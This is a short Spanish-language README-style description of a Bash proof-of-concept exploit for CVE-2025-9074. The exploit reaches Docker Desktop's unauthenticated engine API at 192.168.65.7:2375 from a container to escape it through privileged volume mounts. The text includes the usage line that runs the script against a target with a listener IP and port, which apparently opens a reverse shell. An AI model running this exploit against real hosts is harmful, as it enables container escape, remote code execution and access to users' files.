
Exploit PoC basado en Bash para CVE-2025-9074 atacando la API de Docker Engine no autenticada para lograr escape de contenedor y ejecución remota de código mediante montaje de volúmenes privilegiados.
Una vulnerabilidad crítica CVE-2025-9074 en Docker Desktop permite que contenedores Linux en ejecución local se conecten a la API del motor de Docker a través de la subred predeterminada (192.168.65.7:2375). El problema persiste independientemente del aislamiento mejorado de contenedores (ECI) o de la configuración de exposición TCP. El código de prueba de concepto para CVE-2025-9074 está disponible públicamente. La vulnerabilidad puede permitir el acceso no autorizado a archivos de usuario en el sistema host. Por lo tanto, el nivel de riesgo se califica como Alto Riesgo.
Un script Bash independiente para explotar APIs de Docker expuestas (típicamente puerto 2375) sin autenticación. Esta herramienta automatiza el escape de contenedores mediante montaje de volúmenes, permitiendo ejecución remota de código.
curl y grep. No se requieren binarios externos ni herramientas de terceros.chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
